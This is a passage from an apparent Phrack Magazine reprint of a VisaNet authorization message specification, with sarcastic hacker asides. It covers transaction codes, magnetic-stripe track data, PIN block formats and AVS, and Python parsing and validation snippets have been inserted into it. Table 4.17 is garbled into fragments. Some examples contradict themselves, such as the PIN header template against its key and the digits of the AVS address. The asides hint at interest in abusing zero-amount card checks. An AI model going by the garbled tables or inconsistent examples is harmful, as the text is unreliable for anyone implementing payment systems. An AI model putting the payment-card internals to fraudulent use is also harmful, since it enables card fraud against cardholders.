      45-46    2      A/N    Authorization Transaction Code          4.12
      47-54    8      NUM    Terminal Identification Number          4.13
      55       1      A/N    Payment Service Indicator               4.14
      56-59    4      NUM    Transaction Sequence Number             4.15
      60       1      A/N    Cardholder Identification Code          4.16
      61       1      A/N    Account Data Field                      4.17
      Variable 1-76          Customer Data Field                     4.18
                             (See: DEFINITIONS in Table 3.01d)
      Variable 1      "FS"   Field Separator                         4.19
      Variable 0-32   A/N    Cardholder Identification Data          4.20
      Variable 1      "FS"   Field Separator                         4.21
      Variable 3-12   NUM    Transaction Amount                      4.22
      Variable 1      "FS"   Field Separator                         4.23
      Variable 2      A/N    Device Code/Industry Code               4.24
      Variable 1      "FS"   Field Separator                         4.25
      Variable 0-6    NUM    Issuing/Receiving Institution ID        4.26
I     Variable 1      "FS"   Field Separator                         4.27
      Variable 3-12   NUM    Secondary Amount (Cashback)             4.28
II    Variable 1      "FS"   Field Separator                         4.29
      Variable 25     A/N    Merchant Name                           4.30
      Variable 13     A/N    Merchant City                           4.31
      Variable 2      A/N    Merchant State                          4.32
      Variable 1-14   A/N    Sharing Group                           4.33
      Variable 1      "FS"   Field Separator                         4.34
      Variable 0-12   NUM    Merchant ABA                            4.35
      Variable 0-4    NUM    Merchant Settlement Agent Number        4.36
      Variable 1      "FS"   Field Separator                         4.37
      Variable 6      NUM    Agent Number                            4.38
      Variable 6      NUM    Chain Number                            4.39
      Variable 3      NUM    Batch Number                            4.40
      Variable 1      A/N    Reimbursement Attribute                 4.41
III   Variable 1      "FS"   Field Separator                         4.42
      Variable 6      A/N    Approval Code                           4.43
      Variable 4      NUM    Settlement Date (MMDD)                  4.44
      Variable 4      NUM    Local Transaction Date (MMDD)           4.45
      Variable 6      NUM    Local Transaction Time (HHMMSS)         4.46
      Variable 6      A/N    System Trace Audit Number               4.47
      Variable 2      A/N    Original Auth. Transaction Code         4.48
      Variable 1      A/N    Network Identification Code             4.49
IV    Variable 1      "FS"   Field Separator                         4.50

NOTE: The maximum length request can be as long as 290 bytes for an Interlink
Debit Cancel request (including the STX/ETX/LRC). Since some terminals may be
limited to a 256 byte message buffer, the following tips can save up to 36
bytes:
- Limit fields 4.22 and 4.28 to 7 digits
- Fields 4.26, 4.35 and 4.36 are not required for a debit request
- Field 4.33 can be limited to 10 bytes

TABLE 3.01c
Legend for GROUP (from Table 3.01b)

                                                                    RECORD
FOR THESE TRANSACTIONS, USE >GROUPS                I   II  III IV   FORMAT
Check guarantee                                    X                J
Non-ATM card transactions (Visa cards, other       X   X            J
credit cards, private label credit cards)
Visa supported ATM debit cards: Purchase, Return   X   X   X        G
and Inquiry Request
Visa supported ATM debit cards: Interlink Cancel   X   X   X   X    G
Request

TABLE 3.01d
Definitions for Customer Data Field (from Table 3.01b)

                                                                see
Length   Format Field Name                                      section
MAGNETICALLY read credit cards (SELECT ONE):
up to 76 A/N    Track 1 Read Data                               4.18.1
up to 37 NUM    Track 2 Read Data                               4.18.2
MANUALLY entered credit cards:
up to 28 NUM    Manually Entered Account Number                 4.18.3.1
1        "FS"   Field Separator
4        NUM    Manually Entered Expiration Date (MMYY)         4.18.3.2
MACHINE read and MANUALLY entered check acceptance requests:
1 to 28  A/N    Check Acceptance ID                             4.18.4.1
1        "FS"   Field Separator
30-6     A/N    Manually Entered Check Acceptance Data          4.18.4.2
MAGNETICALLY read ATM debit cards:
up to 37 NUM    Track 2 Read Data                               4.18.2

3.02 RESPONSE RECORD FORMAT


Table 3.02a provides the record format for the authorization response records.
Section 5 provides the data element definitions.


The authorization response record is variable length for record formats
"J" & "G". Refer to Table 3.02b to determine which GROUPS to use from
Table 3.02a.

Table 3.02a
Second Generation Authorization Response Record

                                                                     see
Group Byte#    Length Format Name                                    section
      1        1      A/N    Payment Service Indicator               5.01
      2-5      4      NUM    Store Number                            5.02
      6-9      4      NUM    Terminal Number                         5.03
      10       1      A/N    Authorization Source Code               5.04
      11-14    4      NUM    Transaction Sequence Number             5.05
      15-16    2      A/N    Response Code                           5.06
      17-22    6      A/N    Approval Code                           5.07
      23-28    6      NUM    Local Transaction Date (MMDDYY)         5.08
      29-44    16     A/N    Authorization Response Message          5.09
      45       1      A/N    AVS Result Code                         5.10
      Variable 0/15   NUM    Transaction Identifier                  5.11
      Variable 1      "FS"   Field Separator                         5.12
      Variable 0/4    A/N    Validation Code                         5.13
I     Variable 1      "FS"   Field Separator                         5.14
      Variable 1      A/N    Network Identification Code             5.15
      Variable 4      NUM    Settlement Date (MMDD)                  5.16
      Variable 6      A/N    System Trace Audit Number               5.17
      Variable 12     A/N    Retrieval Reference Number              5.18
II    Variable 6      NUM    Local Transaction Time (HHMMSS)         5.19

Table 3.02b
Legend for GROUP (from Table 3.02a)

                                                                    RECORD
FOR THESE TRANSACTIONS, USE >GROUPS                         I   II  FORMAT
All non-ATM card transactions (Visa cards, other credit     X       J
cards, private label credit cards and check guarantee)
Visa supported ATM debit cards: Purchase, Return, Inquiry   X   X   G
Request and Interlink Cancel Request


3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)


The debit response confirmation record is a fixed length record.
Table 3.03 provides the record format for the second generation debit response
confirmation record. Section 6 provides the data element definitions.


TABLE 3.03

Second Generation Debit Response Confirmation Record

                                                                     see
Group Byte#    Length Format Name                                    section
      1        1      A/N    Network ID Code                         6.01
      2-5      4      NUM    Settlement Date (MMDD)                  6.02
I     6-11     6      A/N    System Trace Audit Number               6.03


4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS


The following subsections will define the authorization request record data
elements.


4.01 RECORD FORMAT


There are several message formats defined within the VisaNet systems. The
second generation authorization format is specified by placing one of the
defined values in the record format field. Table 4.01 provides a brief summary
of the current formats.


TABLE 4.01

VisaNet Authorization Record Format Designators

RECORD FORMAT   RECORD DESCRIPTION
J               All non-ATM card transactions (Visa cards, other credit
                cards, private label credit cards and check guarantee)
G               Visa supported ATM debit cards

4.02 APPLICATION TYPE


The VisaNet authorization system supports multiple application types ranging
from single thread first generation authorization to interleaved leased line
authorization processing. Table 4.02 provides a summary of application type.


TABLE 4.02
VisaNet Application Designators

APPLICATION                                                     USE WITH
TYPE        APPLICATION DESCRIPTION                             REC. FMT
0           Single authorization per connection                 J and G
2           Multiple authorizations per connection              J and G
            single-threaded
4           Multiple authorizations per connect,                J
            interleaved
6           Reserved for future use                             ---
8           Reserved for future use                             ---
ar Peo Pay  Reserved for VisaNet Central Data Capture (CDC)     ---
9           Reserved for VisaNet Down Line Load                 ---
A-Z         Reserved for future use                             ---

4.03 MESSAGE DELIMITER 


The message delimiter separates the format and application type designators from 
the body of the message. The message delimiter is defined as a "." (period) 


4.04 ACQUIRER BIN 


This field contains the Visa assigned six-digit Bank Identification Number (BIN).
The acquirer BIN identifies the merchant signing member that signed the merchant
using the terminal.


NOTE: The merchant receives this number from their signing member.


4.05 MERCHANT NUMBER 


This field contains a NON-ZERO twelve digit number, assigned by the signing 
member and/or the merchant, to identify the merchant within the member systems. 
The combined Acquirer BIN and Merchant Number are required to identify the 
merchant within the VisaNet systems. 


4.06 STORE NUMBER 


This field contains a NON-ZERO four-digit number assigned by the signing member 
and/or the merchant to identify the merchant store within the member systems. 
The combined Acquirer BIN, Merchant Number, and Store Number are required to 
identify the store within the VisaNet systems. 


4.07 TERMINAL NUMBER 


This field contains a NON-ZERO four-digit number assigned by the signing member 
and/or the merchant to identify the merchant store within the member systems. 
This field can be used by systems which use controllers and/or concentrators to 
identify the devices attached to the controllers and/or concentrators. 


4.08 MERCHANT CATEGORY CODE


This field contains a four-digit number assigned by the signing member from a 
list of category codes defined in the VisaNet Merchant Data Standards Handbook 
to identify the merchant type. 


4.09 MERCHANT COUNTRY CODE


This field contains a three-digit number assigned by the signing member from a
list of country codes defined in the VisaNet V.I.P. System Message Format
Manuals to identify the merchant location country.


4.10 MERCHANT CITY CODE


This field contains a five character code used to further identify the merchant
location. Within the United States, the five high order zip code digits of the
address of the store location are used. Outside of the United States, this
field will be assigned by the signing member.


4.11 TIME ZONE DIFFERENTIAL


This field contains a three-digit code used to calculate the local time within
the VisaNet authorization system. It is calculated by the signing member,
providing the local time zone differential from Greenwich Mean Time (GMT). The
first two digits specify the magnitude of the differential. Table 4.11 provides
a brief summary of the Time Zone Differential codes.


TABLE 4.11
Time Zone Differential Code Format


Byte #  Length  Format   Contents
1       1       NUMERIC  DIRECTION
                         0 = Positive, Local Ahead of GMT,
                             offset in hours
                         1 = Negative, Local Time behind GMT,
                             offset in hours
                         2 = Positive, offset in 15 minute
                             increments
                         3 = Negative, offset in 15 minute
                             increments
                         4 = Positive, offset in 15 minute
                             increments, participating in
                             daylight savings time
                         5 = Negative, offset in 15 minute
                             increments, participating in
                             daylight savings time
                         6-9 = INVALID CODES
2-3     2       NUMERIC  MAGNITUDE
                         For Byte #1 = 0 or 1
                             0 <= MAGNITUDE <= 12
                         For Byte #1 = 2 through 5
                             0 <= MAGNITUDE <= 48
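

The decoding rules of Table 4.11 as an added example (not part of the original
file and not Visa code): a validator that turns a three-digit code into a signed
GMT offset, following the table's byte layout (byte 1 direction, bytes 2-3
magnitude). The class and function names are assumptions made for illustration.

```python
from datetime import timedelta
from typing import NamedTuple


class TimeZoneDifferential(NamedTuple):
    offset: timedelta      # signed offset of local time from GMT
    observes_dst: bool     # True only for direction codes 4 and 5


# Byte 1 of Table 4.11: direction code -> (sign, minutes per magnitude unit,
# largest legal magnitude, participates in daylight savings time).
_DIRECTIONS = {
    "0": (+1, 60, 12, False),
    "1": (-1, 60, 12, False),
    "2": (+1, 15, 48, False),
    "3": (-1, 15, 48, False),
    "4": (+1, 15, 48, True),
    "5": (-1, 15, 48, True),
}


def decode_tz_differential(code: str) -> TimeZoneDifferential:
    """Validate and decode field 4.11 (hypothetical helper, not from the spec)."""
    if len(code) != 3 or not (code.isascii() and code.isdigit()):
        raise ValueError("time zone differential must be three numeric characters")
    direction, magnitude = code[0], int(code[1:])
    if direction not in _DIRECTIONS:
        raise ValueError(f"direction code {direction} is invalid (6-9)")
    sign, unit_minutes, max_magnitude, dst = _DIRECTIONS[direction]
    if magnitude > max_magnitude:
        raise ValueError(
            f"magnitude {magnitude} exceeds {max_magnitude} for direction {direction}"
        )
    return TimeZoneDifferential(
        timedelta(minutes=sign * magnitude * unit_minutes), dst
    )


if __name__ == "__main__":
    # Constructed inputs; 108 is the value the text itself uses as its example.
    for sample in ("108", "222", "532", "113", "708"):
        try:
            print(sample, decode_tz_differential(sample))
        except ValueError as err:
            print(sample, "rejected:", err)
```
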


A code of 108 indicates the local Pacific Standard time which is 8 hours behind
GMT.


4.12 AUTHORIZATION TRANSACTION CODE


This field contains a two-character code defined by VisaNet and generated by the
terminal identifying the type of transaction for which the authorization is
requested. Table 4.12 provides a summary of the transaction codes.
TABLE 4.12
Authorization Transaction Codes


TRAN
CODE  TRANSACTION DESCRIPTION
54    Purchase
39    Cash Advance
56    Mail/Telephone Order
57    Quasi Cash
58    Card Authentication - Transaction Amt & Secondary Amt must equal
      $0.00, AVS may be requested [ah-hah!]
64    Repeat: Purchase
65    Repeat: Cash Advance
66    Repeat: Mail/Telephone Order (MO/TO)
67    Repeat: Quasi Cash
68    Repeat: Card Authentication - Transaction Amt & Secondary Amt must
      equal $0.00, AVS may be requested
70    Check guarantee, must include RIID (field 4.26)
81    Proprietary Card
84    Private Label Purchase
85    Private Label, Cash Advance
86    Private Label Mail/Telephone Order (MO/TO)
87    Private Label Quasi Cash
88    Private Label Card Authentication - Transaction Amt & Secondary Amt
      must equal $0.00, AVS may be requested
93    Debit Purchase
94    Debit Return
95    Interlink Debit Cancel (see NOTE below)


NOTE (for TRANSACTION CODE = 95)


- For Interlink Debit CANCEL request message, all of the fields in
  Groups I and II will come from the original transaction request or the
  original transaction response, with the exception of the following:

    - The AUTHORIZATION TRANSACTION CODE will need to be changed to the
      Debit CANCEL code.

    - The TRANSACTION SEQUENCE NUMBER should be incremented in the
      normal fashion.

    - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATA
      (PIN) will need to be re-entered.


4.13 TERMINAL IDENTIFICATION NUMBER 


This field contains an eight-digit code that must be greater than zero, defined 
by the terminal down line load support organization. Support may be provided by 
the Visa’s Merchant Assistance Center (MAC), the signing member, or a third 
party organization. The terminal ID is used to uniquely identify the terminal 
in the terminal support system and identification for the VisaNet Central Data 
Capture (CDC). The terminal ID may not be unique within the VisaNet system. 
Each terminal support provider and member that provides its own terminal support 
can assign potentially identical terminal IDs within its system. The terminal 
ID can be used by the terminal down line load system to access the terminal 
application and parameter data from a system data base when down line loading a 
terminal. [huh?] 


NOTE: It is recommended that [the] Terminal ID Number should be unique within 
the same Acquirer’s BIN. 


4.14 PAYMENT SERVICE INDICATOR 


This is a one-character field used to indicate a request for REPS qualification. 
Table 4.14 provides a summary of the codes. 


TABLE 4.14 
Payment Service Indicator Codes 


RECORD 
FORMAT VALUE DESCRIPTION 
J Y Yes 
J N No 
G Y Yes 
G N No 


[repetitive? you bet] 


4.15 TRANSACTION SEQUENCE NUMBER 


This field contains a four-digit code which is generated by the terminal as the 
sequence number for the transaction. The sequence number is used by the 
terminal to match request and response messages. This field is returned by 
VisaNet without sequence verification. The sequence number is incremented with 
wrap from 9999 to 0001.


4.16 CARDHOLDER IDENTIFICATION CODE


This one-character field contains a code that indicates the method used to
identify the cardholder. Table 4.16 provides a summary of the codes.


TABLE 4.16
Cardholder Identification Codes


ID CODE      IDENTIFICATION METHOD
A            Personal Identification Number-23 byte static key (non-USA) fnord
B            PIN at Automated Dispensing Machine - 32 byte static key
C            Self Svc Limited Amount Terminal (No ID method available)
D            Self-Service Terminal (No ID method available)
E            Automated Gas Pump (No ID method available)
K            Personal Identification Number - 32 byte DUK/PT
N            Customer Address via Address Verification Service (AVS)
S            Personal Identification Number - 32 byte static key
Z            Cardholder Signature - Terminal has a PIN pad
@            Cardholder Signature - No PIN pad available
F-J,L,M,O-R  Reserved for future use


4.17 ACCOUNT DATA SOURCE


This field contains a one-character code defined by Visa and generated by the
terminal to indicate the source of the customer data entered in field 4.18.
Table 4.17 provides a summary of codes.


TABLE 4.17 
Account Data Source Codes 


SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION 


ESERVED 
E SERVED 


ESERVED 
ESERVED 
Manually 


@QxHDAODUWY 


y 
Manually 
ED 


Bar-code read 
- OCR read 


ag-stripe read, Track 2 
ag-stripe read, Track 1 


—- Manually keyed, bar-code capable terminal 

- Manually keyed, OCR capable terminal 

keyed, Track 2 capable 

keyed, Track 1 capable 

keyed, terminal has no card reading capability 
for future use 


- If a dual track reading terminal is being used, be sure to enter the correct
  value of "D" or "H" for the magnetic data that is transmitted


—- When data is manually keyed at a dual track reading terminal, enter either 


a wow or an my 


4.18 CUSTOMER DATA FIELD 


This is a variable length field containing customer account or check acceptance
ID data in one of three formats. The cardholder account information can be read
from the card or it may be entered manually. Additionally the terminal can be
used for check authorization processing with the check acceptance identification
number entered by the operator for transmission in this field.


NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
the following requirement must be available as an operating option if the
merchant location is found to be generating a disproportionately high percentage
of Suspect Transactions [lets get downright hostile about it] as defined in
chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter
9.10.B.2 requires that:

- The terminal must read the track data using a magnetic stripe reading
  terminal
- The terminal must prompt the wage slave to manually enter the last four
  digits of the account number
- The terminal must compare the keyed data with the last four digits of the
  account number in the magnetic stripe
- If the compare is successful, the card is acceptable to continue in the
  authorization process and the terminal must transmit the full, unaltered
  contents of the magnetic stripe in the authorization message.
- If the compare fails, the card should not be honored at the Point of Sale


4.18.1 TRACK 1 READ DATA 


This is a variable length field with a maximum data length of 76 characters.


The track 1 data read from the cardholder’s card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4. The character set definitions are
provided in section 7 for reference. As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters. The
separators are to be converted to a "^" (HEX 5E) character. The entire
track must be provided in the request message. The character set and data
content are different between track 1 and track 2. The data read by a track 2
device can not be correctly reformatted and presented as though it were read by
a track 1 device. [aw shucks] The converted data can not be modified by adding
or deleting non-framing characters and must be a one-for-one representation of
the character read from the track.


4.18.2 TRACK 2 READ DATA 


This is a variable length field with a maximum data length of 37 characters.


The track 2 data read from the cardholder’s card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4. The character set definitions are
provided in section 7 for reference. As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters. The
separators are to be converted to a "^" (HEX 5E) character. The entire
track must be provided in the request message. The character set and data
content are different between track 2 and track 1. The data read by a track 1
device can not be correctly reformatted and presented as though it were read by
a track 2 device. The converted data can not be modified by adding or deleting
non-framing characters and must be a one-for-one representation of the character
read from the track. [repetitive? you bet]


4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 


The customer credit card data may be key entered when the card can not be read, 
when a card is not present, or when a card reader is not available. 


4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 


This is a variable length field consisting of 5 to 28 alphanumeric characters.


The embossed cardholder data, that is key entered, is validated by the terminal
using rules for each supported card type. For example, both Visa and Master
Card include a mod 10 check digit as the last digit of the Primary Account
Number. The Primary Account Number (PAN) is encoded as seven-bit characters
as defined in ANSI X3.4. The PAN is then provided in the manually entered
record format provided in Table 3.01b. The PAN must be provided without
embedded spaces.
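

The two terminal-side checks described above (the 9.10.B.2 last-four comparison
and the mod 10 check on a keyed account number), as an added example that is not
part of the original file. The comparison catches a stripe whose encoded account
number differs from the number the operator reads off the card. It assumes that
converted Track 2 data begins with the account number followed by the first "^"
separator; function names and sample values are constructed for illustration.

```python
SEPARATOR = "^"        # hex 5E, what the terminal converts track separators to
TRACK2_MAX = 37        # maximum Track 2 data length from section 4.18.2


def mod10_ok(pan: str) -> bool:
    """Mod 10 (Luhn) check: the last digit of the PAN is the check digit."""
    if not (pan.isascii() and pan.isdigit()):
        return False
    total = 0
    for position, char in enumerate(reversed(pan)):
        digit = int(char)
        if position % 2 == 1:          # double every second digit from the right
            digit = digit * 2 - 9 if digit > 4 else digit * 2
        total += digit
    return total % 10 == 0


def validate_keyed_pan(pan: str, uses_mod10: bool = True) -> str:
    """Apply the 4.18.3.1 rules to a manually entered account number."""
    if not 5 <= len(pan) <= 28:
        raise ValueError("keyed account number must be 5 to 28 characters")
    if not (pan.isascii() and pan.isalnum()):
        raise ValueError("keyed account number must be alphanumeric, no spaces")
    if uses_mod10 and not mod10_ok(pan):
        raise ValueError("mod 10 check digit does not match")
    return pan


def pan_from_track2(track2: str) -> str:
    """Return the account number from converted Track 2 data (assumed layout)."""
    if not track2 or len(track2) > TRACK2_MAX:
        raise ValueError("Track 2 data must be 1 to 37 characters")
    pan, separator, _rest = track2.partition(SEPARATOR)
    if not separator or not (pan.isascii() and pan.isdigit()) or len(pan) < 5:
        raise ValueError("no account number before the first separator")
    return pan


def stripe_matches_keyed_last4(track2: str, keyed_last4: str) -> bool:
    """9.10.B.2: compare the keyed digits with the stripe's last four.

    True  -> continue, sending the full, unaltered track data.
    False -> the card should not be honored at the point of sale.
    """
    if len(keyed_last4) != 4 or not (keyed_last4.isascii() and keyed_last4.isdigit()):
        return False
    try:
        return pan_from_track2(track2)[-4:] == keyed_last4
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample: a well-known test account number, not a real card.
    sample_track2 = "4111111111111111^99121010000"
    print(stripe_matches_keyed_last4(sample_track2, "1111"))
    print(stripe_matches_keyed_last4(sample_track2, "1112"))
```
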


4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 


This four-digit field contains the card expiration date in the form MMYY
(month-month-year-year)


4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 


The customer data may be card read or manually key entered for check acceptance
transactions.


4.18.4.1 CHECK ACCEPTANCE ID 


This field is a variable length field consisting of 1 to 28 alphanumeric
characters. The check acceptance vendor will provide the data format and
validation rules to be used by the terminal. Typically the ID consists of a
two-digit state code and an ID which may be the customer’s drivers license
number.


4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA


This six-character field contains the customer birth date or a control code in
the form specified by the check acceptance processor.


4.19 FIELD SEPARATOR


The authorization record format specifies the use of the "FS" character.


4.20 CARDHOLDER IDENTIFICATION DATA


This field will be 0, 23, 29 or 32 characters in length. The cardholder ID
codes shown in Table 4.16 indicate the type of data in this field. Table
4.20 provides a brief summary of the current formats.


TABLE 4.20
Cardholder Identification Data Definitions


CARDHOLDER                                                   VALUE(S) FROM
ID LENGTH   DESCRIPTION                                      TABLE 4.16
0           Signature ID used, No PIN pad is present         @,C,D or E
0           Signature ID used on a terminal with a PIN pad   Z
23          A PIN was entered on a STATIC key PIN pad        A
32          A PIN was entered on a STATIC key PIN pad        B
32          A PIN was entered on a DUK/PT key PIN pad        K
32          A PIN was entered on a STATIC key PIN pad        S
0 to 29     AVS was requested                                N


4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID


NOTE: The 23 byte static key technology is NOT approved for use in terminals
deployed in the Visa U.S.A. region. [thanks nsa!]


When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
terminal will generate the following data:


1UFxxyyaaaaaaaaaaaaaaaa


Where:


1J - Header - PIN was entered

f  - Function Key Indicator - A single byte indicating which, if any,
     function key was pressed on the PIN pad. This field is currently
     not edited. Any printable character is allowed.

xx - PIN Block Format - These two numeric bytes indicate the PIN
     encryption method used to create the encrypted PIN block. Visa
     currently supports four methods; 01, 02, 03, & 04. For more
     information, please refer to the VisaNet Standards Manual, Card
     Technology Standards, PIN and Security Standards, Section 2,
     Chapter 3, PIN Block Formats

aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
     PIN block format consists of 64 bits of data. Since the VisaNet
     Second Generation protocol allows only printable characters in
     data fields, these 64 bits must be expanded to ensure that no
     values less than hex "20" are transmitted. To expand the 64 bit
     encrypted PIN block, remove four bits at a time and convert them
     to ANSI X3.4 characters using Table 4.20. After this conversion,
     the 64 bit encrypted PIN block will consist of 16 characters that
     will be placed in the Expanded Encrypted PIN Block Data field.


4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 


When a PIN is entered on a PIN pad supporting 32 byte static key technology,
the terminal will generate the following data:


aaaaaaaaaaaaaaaa2001ppzz00000000


Where:


aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
     PIN block format consists of 64 bits of data. Since the VisaNet
     Second Generation protocol allows only printable
     characters in data fields, these 64 bits must be expanded to
     ensure that no values less than hex "20" are transmitted. To
     expand the 64 bit encrypted PIN block, remove four bits at a
     time and convert them to ANSI X3.4 characters using table 4.20.
     After this conversion, the 64 bit encrypted PIN block will
     consist of 16 characters that will be placed in the Expanded
     Encrypted PIN Block Data field.

20 - Security Format Code - This code defines that the Zone
     Encryption security technique was used.

01 - PIN Encryption Algorithm Identifier - This code defines that the
     ANSI DES encryption technique was used.

pp - PIN Block Format Code - This code describes the PIN block format
     that was used by the acquirer. Values are:

     01 - Format is based on the PIN, the PIN length, selected
          rightmost digits of the account number and the pad
          characters "0" and "F"; combined through an exclusive
          "OR" operation.
     02 - Format is based on the PIN, the PIN length and a user
          specified numeric pad character.
     03 - Format is based on the PIN and the "F" pad character.
     04 - Format is the same as "01" except that the leftmost
          account number digits are selected.

zz - Zone Key Index - This index points to the zone key used by the
     acquirer to encrypt the PIN block. Values are:

     01 - First key
     02 - Second key

00000000 - Visa Reserved - Must be all zeros


For additional information, refer to the VisaNet manual V.I.P. System, Message
Formats, Section B: Field Descriptions. Specifically, fields 52 and 53;
Personal Identification Number (PIN) Data and Security Related Control
Information respectively.


4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID


When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
will generate the following 32 bytes:


aaaaaaaaaaaaaaaakkkkkkssssssssss


Where:


aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
     PIN block format consists of 64 bits of data. Since the
     VisaNet Second Generation protocol allows only printable
     characters in data fields, these 64 bits must be expanded to
     ensure that no values less than hex "20" are transmitted. To
     expand the 64 bit encrypted PIN block, remove four bits at a
     time and convert them to ANSI X3.4 characters using table 4.20.
     After this conversion, the 64 bit encrypted PIN block will
     consist of 16 characters that will be placed in the Expanded
     Encrypted PIN Block Data field. [repetitive? you bet]

kkkkkk - Key Set Identifier (KSID) - Is represented by a unique,
     Visa assigned, six digit bank identification number.

ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
     Transaction Counter - Is represented by the concatenation of these
     two hexadecimal fields. The PIN pad serial number is stored as
     five hex digits minus one bit for a total of 19 bits of data. The
     transaction counter is stored as five hex digits plus one bit for
     a total of 21 bits of data. These two fields concatenated
     together will contain 40 bits. Since the VisaNet Second
     Generation protocol allows only printable characters in data
     fields, these 40 bits must be expanded to ensure that no values
     less than hex "20" are transmitted. To expand this 40 bit field,
     remove four bits at a time and convert them to ASCII characters
     using table 4.20. After this conversion, this 40 bit field will
     consist of 10 characters that will be placed in the Expanded
     TRSM ID & Expanded Transaction Counter Field.


TABLE 4.20
PIN Block conversion Table


HEXADECIMAL   ANSI X3.4
DATA          CHARACTER
0000          0
0001          1
0010          2
0011          3
0100          4
0101          5
0110          6
0111          7
1000          8
1001          9
1010          A
1011          B
1100          C
1101          D
1110          E
1111          F


4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]


When Address Verification Service is requested, this field will contain the
mailing address of the cardholder’s monthly statement. The format of this
field is:


<street address><apt no.><zip code>

or

<post office box number><zipcode>


Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second"
becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP
code. For instance:

1391 ELM STREET 40404
is equivalent to: 1931ELMSTREET40404

P.O. Box 24356 55555
is not equivalent to P.O.BOX2435655555


If a field is not available or not applicable, it may be skipped. If nine
digits are available, the last five digits should always be used to pour more
sand into the wheels of progress.
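

A parser for the two 32-character layouts of sections 4.20.2 and 4.20.3,
including the Table 4.20 expansion, as an added example that is not part of the
original file. It assumes the 40-bit DUK/PT field carries the 19-bit TRSM ID in
its high-order bits and the 21-bit counter in its low-order bits; all names and
sample values are constructed for illustration.

```python
from dataclasses import dataclass

HEX_CHARS = "0123456789ABCDEF"   # Table 4.20: four-bit value -> character


def expand(data: bytes) -> str:
    """Expand binary data four bits at a time into printable characters."""
    return "".join(HEX_CHARS[b >> 4] + HEX_CHARS[b & 0x0F] for b in data)


def collapse(text: str) -> bytes:
    """Inverse of expand(); rejects any character outside Table 4.20."""
    if len(text) % 2 or any(c not in HEX_CHARS for c in text):
        raise ValueError("field is not Table 4.20 expanded data")
    return bytes.fromhex(text)


@dataclass(frozen=True)
class StaticKeyData:             # section 4.20.2, ID codes B and S
    pin_block: bytes             # 64 bits of ciphertext, never a clear PIN
    pin_block_format: str        # "01" .. "04"
    zone_key_index: str          # "01" first key, "02" second key


@dataclass(frozen=True)
class DukptData:                 # section 4.20.3, ID code K
    pin_block: bytes
    ksid: str                    # six-digit Key Set Identifier
    trsm_id: int                 # 19-bit PIN pad serial number
    counter: int                 # 21-bit transaction counter


def parse_cardholder_id(id_code: str, data: str):
    """Parse a 32-character Cardholder Identification Data field."""
    if len(data) != 32:
        raise ValueError("expected exactly 32 characters")
    pin_block, tail = collapse(data[:16]), data[16:]
    if id_code in ("B", "S"):
        if tail[0:2] != "20":
            raise ValueError("security format code must be 20")
        if tail[2:4] != "01":
            raise ValueError("PIN encryption algorithm identifier must be 01")
        pin_block_format, zone_key_index = tail[4:6], tail[6:8]
        if pin_block_format not in ("01", "02", "03", "04"):
            raise ValueError("unknown PIN block format code")
        if zone_key_index not in ("01", "02"):
            raise ValueError("unknown zone key index")
        if tail[8:] != "00000000":
            raise ValueError("reserved bytes must be all zeros")
        return StaticKeyData(pin_block, pin_block_format, zone_key_index)
    if id_code == "K":
        ksid = tail[:6]
        if not (ksid.isascii() and ksid.isdigit()):
            raise ValueError("KSID must be six digits")
        bits = int.from_bytes(collapse(tail[6:]), "big")      # 40 bits
        # Assumed bit order: TRSM ID first (high 19 bits), counter last (low 21).
        return DukptData(pin_block, ksid, bits >> 21, bits & 0x1FFFFF)
    raise ValueError("ID code does not carry a 32-character PIN field")


def build_dukpt_field(pin_block: bytes, ksid: str, trsm_id: int, counter: int) -> str:
    """Build the 4.20.3 layout (used here only to make constructed test input)."""
    if len(pin_block) != 8 or trsm_id >= 1 << 19 or counter >= 1 << 21:
        raise ValueError("value does not fit its field")
    packed = (trsm_id << 21 | counter).to_bytes(5, "big")
    return expand(pin_block) + ksid + expand(packed)


if __name__ == "__main__":
    sample_block = bytes.fromhex("0123456789ABCDEF")   # constructed ciphertext
    field = build_dukpt_field(sample_block, "400123", 0x12345, 7)
    print(field)
    print(parse_cardholder_id("K", field))
```
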


4.21 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character.


==Phrack Magazine==


Volume Five, Issue Forty-Six, File 16 of 28


****************************************************************************


VisaNet Operations (Continued)


4.22 TRANSACTION AMOUNT


This is a variable field from three to twelve digits in length. The transaction
amount includes the amount in 4.28, Secondary Amount. Therefore, field 4.22
must be greater than or equal to field 4.28.


The transaction amount is presented by the terminal with an implied decimal
point. For example $.01 would be represented in the record as "001". When the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the amount field must be limited to seven digits
(9999999). The terminal may be used with authorization systems which
support other currencies that require the full twelve-digit field.


4.23 FIELD SEPARATOR


The authorization record format specifies the use of the "FS" character.


4.24 DEVICE CODE/INDUSTRY CODE


This field is used to identify the device type which generated the transaction
